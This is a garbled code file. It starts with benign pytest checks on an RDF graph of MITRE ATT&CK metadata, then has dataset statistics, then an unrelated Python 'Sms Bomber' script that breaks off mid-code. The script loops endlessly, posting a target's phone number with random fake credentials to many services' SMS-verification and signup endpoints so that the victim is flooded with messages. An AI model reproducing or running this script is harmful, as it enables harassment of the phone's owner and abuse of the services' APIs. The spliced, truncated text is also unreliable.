qres = ask(pre, "attack:ref_ecc452824f05f3b2cfba1d9dab904885b6bb2b0fdd87ec1775571928ee8e65dd a dcterms:BibliographicResource; dcterms:source \"https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_pre_24(pre):
qres = ask(pre, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
assert bool(qres)
def test_pre_25(pre):
qres = ask(pre, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_pre_26(pre):
qres = ask(pre, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\" .")
assert bool(qres)
def test_pre_27(pre):
qres = ask(pre, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_pre_28(pre):
qres = ask(pre, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_pre_29(pre):
qres = ask(pre, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
assert bool(qres)
def test_pre_30(pre):
qres = ask(pre, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
assert bool(qres)
def test_pre_31(pre):
qres = ask(pre, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
assert bool(qres)
def test_pre_32(pre):
qres = ask(pre, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_pre_33(pre):
qres = ask(pre, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_pre_34(pre):
qres = ask(pre, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
assert bool(qres)
def test_coa_0(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction .")
assert bool(qres)
def test_coa_1(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; cti:deprecated true .")
assert bool(qres)
def test_coa_2(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:created \"2018-10-17T00:14:20.652000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_coa_3(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_coa_4(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; skos:definition ?description .")
assert bool(qres)
def test_coa_5(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:identifier \"course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025\" .")
assert bool(qres)
def test_coa_6(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:modified \"2020-01-17T16:46:19.274000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_coa_7(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:references attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d .")
assert bool(qres)
def test_coa_8(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:references attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe .")
assert bool(qres)
def test_coa_9(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_coa_10(course_of_action):
qres = ask(course_of_action, "attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; skos:prefLabel \"Windows Remote Management Mitigation\" .")
assert bool(qres)
def test_coa_11(course_of_action):
qres = ask(course_of_action, "attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource .")
assert bool(qres)
def test_coa_12(course_of_action):
qres = ask(course_of_action, "attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; core:externalID \"T1028\" .")
assert bool(qres)
def test_coa_13(course_of_action):
qres = ask(course_of_action, "attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_coa_14(course_of_action):
qres = ask(course_of_action, "attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--t1028\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_coa_15(course_of_action):
qres = ask(course_of_action, "attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/mitigations/T1028\"^^xsd:anyURI .")
assert bool(qres)
def test_coa_21(course_of_action):
qres = ask(course_of_action, "attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource ." )
assert bool(qres)
def test_coa_22(course_of_action):
qres = ask(course_of_action, "attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; cti:referenceSource \"NSA Spotting\" ." )
assert bool(qres)
def test_coa_23(course_of_action):
qres = ask(course_of_action, "attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; dcterms:bibliographicCitation \"National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.\" ." )
assert bool(qres)
def test_coa_24(course_of_action):
qres = ask(course_of_action, "attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; dcterms:identifier \"nsa-spotting\"^^xsd:NMTOKEN ." )
assert bool(qres)
def test_coa_25(course_of_action):
qres = ask(course_of_action, "attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; dcterms:source \"https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm\"^^xsd:anyURI ." )
assert bool(qres)
def test_coa_31(course_of_action):
qres = ask(course_of_action, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
assert bool(qres)
def test_coa_32(course_of_action):
qres = ask(course_of_action, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_coa_33(course_of_action):
qres = ask(course_of_action, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\" .")
assert bool(qres)
def test_coa_34(course_of_action):
qres = ask(course_of_action, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_coa_35(course_of_action):
qres = ask(course_of_action, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_coa_36(course_of_action):
qres = ask(course_of_action, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
assert bool(qres)
def test_coa_41(course_of_action):
qres = ask(course_of_action, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
assert bool(qres)
def test_coa_42(course_of_action):
qres = ask(course_of_action, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
assert bool(qres)
def test_coa_43(course_of_action):
qres = ask(course_of_action, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_coa_44(course_of_action):
qres = ask(course_of_action, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_coa_45(course_of_action):
qres = ask(course_of_action, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
assert bool(qres)
def test_relationship_0(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_1(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; core:externalID \"T1094\" .")
assert bool(qres)
def test_relationship_2(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_relationship_3(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--t1094\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_4(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/techniques/T1094\"^^xsd:anyURI .")
assert bool(qres)
def test_relationship_11(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_12(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; core:externalID \"S0084\" .")
assert bool(qres)
def test_relationship_13(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_relationship_14(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--s0084\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_15(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/software/S0084\"^^xsd:anyURI.")
assert bool(qres)
def test_relationship_21(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_22(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; cti:referenceSource \"University of Birmingham C2\" .")
assert bool(qres)
def test_relationship_23(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.\" .")
assert bool(qres)
def test_relationship_24(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; dcterms:identifier \"university-of-birmingham-c2\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_25(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; dcterms:source \"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_relationship_31(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship .")
assert bool(qres)
def test_relationship_32(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; cti:relationSource attack:malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61 .")
assert bool(qres)
def test_relationship_33(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; cti:relationTarget attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 .")
assert bool(qres)
def test_relationship_34(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:created \"2018-10-17T00:14:20.652000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_35(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_relationship_36(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; skos:definition \"[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)\" .")
assert bool(qres)
def test_relationship_37(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:identifier \"relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25\" .")
assert bool(qres)
def test_relationship_38(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:modified \"2020-02-11T16:23:56.676000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_39(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:references attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 .")
assert bool(qres)
def test_relationship_40(relationship):
qres = ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_relationship_51(relationship):
qres = ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_52(relationship):
qres = ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; cti:referenceSource \"Cylance Dust Storm\" .")
assert bool(qres)
def test_relationship_53(relationship):
qres = ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.\" .")
assert bool(qres)
def test_relationship_54(relationship):
qres = ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; dcterms:identifier \"cylance-dust-storm\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_55(relationship):
qres = ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; dcterms:source \"https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_relationship_61(relationship):
qres = ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")
assert bool(qres)
def test_relationship_62(relationship):
qres = ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_63(relationship):
qres = ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\" .")
assert bool(qres)
def test_relationship_64(relationship):
qres = ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_65(relationship):
qres = ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
assert bool(qres)
def test_relationship_66(relationship):
qres = ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
assert bool(qres)
def test_relationship_71(relationship):
qres = ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")
assert bool(qres)
def test_relationship_72(relationship):
qres = ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")
assert bool(qres)
def test_relationship_73(relationship):
qres = ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_74(relationship):
qres = ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")
assert bool(qres)
def test_relationship_75(relationship):
qres = ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
assert bool(qres)
def test_relationship_81(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern .")
assert bool(qres)
def test_relationship_82(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; cti:revoked true .")
assert bool(qres)
def test_relationship_83(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:created \"2017-05-31T21:31:10.314000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_84(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:identifier \"attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00\" .")
assert bool(qres)
def test_relationship_85(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:modified \"2020-03-20T19:03:04.295000+00:00\"^^xsd:dateTime .")
assert bool(qres)
def test_relationship_86(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:references attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 .")
assert bool(qres)
def test_relationship_87(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:references attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f .")
assert bool(qres)
def test_relationship_88(relationship):
qres = ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; skos:prefLabel \"Custom Command and Control Protocol\" .")
assert bool(qres)
#def test_relationship_91(relationship):
# qres = ask(relationship, "?g a cti:RelationshipGraph")
# assert bool(qres)
#SELECT ?g ?s ?p ?o
#WHERE {
# GRAPH ?g {
# ?s ?p ?o
# } .
# ?g a cti:RelationshipGraph .
#}
#def test_relationship_92(relationship):
# qres = ask(relationship, "{ attack:malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61 cti:uses attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 . } dcterms:created \"2018-10-17T00:14:20.652000+00:00\"^^xsd:dateTime")
# assert bool(qres)
| 56.986096
| 436
| 0.792838
| 6,332
| 53,282
| 6.518793
| 0.077543
| 0.035952
| 0.071904
| 0.086489
| 0.896674
| 0.879085
| 0.840977
| 0.812026
| 0.776486
| 0.750321
| 0
| 0.174739
| 0.096393
| 53,282
| 934
| 437
| 57.047109
| 0.68259
| 0.009365
| 0
| 0.326252
| 0
| 0.14871
| 0.498588
| 0.368999
| 0
| 0
| 0
| 0
| 0.318665
| 1
| 0.329287
| false
| 0
| 0.00607
| 0
| 0.338392
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c447eb654c8f2b4cb83e66f95acf009beb425590
| 52,696
|
py
|
Python
|
bomber.py
|
d0xo0/bombardier
|
bc1884bd0de3301f3628b333a532ee199738e1a4
|
[
"Apache-2.0"
] | 1
|
2022-01-27T21:53:35.000Z
|
2022-01-27T21:53:35.000Z
|
bomber.py
|
d0xo0/bombardier
|
bc1884bd0de3301f3628b333a532ee199738e1a4
|
[
"Apache-2.0"
] | null | null | null |
bomber.py
|
d0xo0/bombardier
|
bc1884bd0de3301f3628b333a532ee199738e1a4
|
[
"Apache-2.0"
] | null | null | null |
import requests, random
from requests import get
from bs4 import BeautifulSoup as bs
import colorama
from termcolor import colored
from tkinter import filedialog as fd
from tkinter import *
from tkinter import messagebox
from tkinter import Label
from random import randint
import threading, os, sys, time
colorama.init()
root = Tk()
root.title('Sms Bomber, by HZ')
root.geometry('500x400+300+200')
def good():
print(colored('SMS sent', 'green'))
def error():
print(colored('SMS not sent', 'red'))
def spamNOproxy(phone):
while True:
_name = ''
for x in range(12):
_name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
_email = _name + '@gmail.com'
email = _name + '@gmail.com'
_phone = phone
_phone9 = _phone[1:]
_phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10]
_phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11]
_phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_text = 'Ляля'
phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10]
phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10]
try:
requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={})
good()
except Exception as e:
error()
try:
requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9})
good()
except Exception as e:
error()
try:
requests.get('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407')
good()
except Exception as e:
error()
try:
requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password})
good()
except Exception as e:
error()
try:
requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'})
good()
except Exception as e:
error()
try:
requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'})
good()
except Exception as e:
error()
try:
requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
good()
except Exception as e:
error()
try:
requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'})
good()
except Exception as e:
error()
try:
requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'})
good()
except Exception as e:
error()
try:
requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'})
good()
except Exception as e:
error()
try:
requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'})
good()
except Exception as e:
error()
try:
requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'})
good()
except Exception as e:
error()
try:
requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone})
good()
except Exception as e:
error()
try:
